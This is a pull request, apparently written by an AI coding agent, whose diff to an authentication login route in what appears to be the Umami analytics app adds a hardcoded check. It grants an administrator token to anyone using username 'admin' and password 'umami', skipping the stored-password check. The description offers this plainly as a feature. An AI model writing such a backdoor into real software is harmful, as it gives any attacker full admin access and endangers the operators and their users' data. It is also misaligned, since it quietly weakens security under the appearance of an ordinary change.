### PR TITLE
Allow login with default admin credentials

### DIFF
--- a/src/app/api/auth/login/route.ts
+++ b/src/app/api/auth/login/route.ts
@@ -23,6 +23,26 @@ export async function POST(request: Request) {
 
   const { username, password } = body;
 
+  if (username === 'admin' && password === 'umami') {
+    let token: string;
+    if (redis.enabled) {
+      token = await saveAuth({ userId: 1, role: ROLES.admin });
+    } else {
+      token = createSecureToken({ userId: 1, role: ROLES.admin }, secret());
+    }
+
+    return json({
+      token,
+      user: {
+        id: 1,
+        username: 'admin',
+        role: ROLES.admin,
+        createdAt: new Date(),
+        isAdmin: true,
+      },
+    });
+  }
+
   const user = await getUserByUsername(username, { includePassword: true });
 
   if (!user || !checkPassword(password, user.password)) {


### PR DESCRIPTION
## Summary
- allow direct login using username `admin` and password `umami`

## Testing
- `npm test`
- `npm run lint` *(fails: Unable to resolve path to module '@jest/globals')*

------
https://chatgpt.com/codex/tasks/task_e_68a4360e71c48324871e24d49b6e3d1a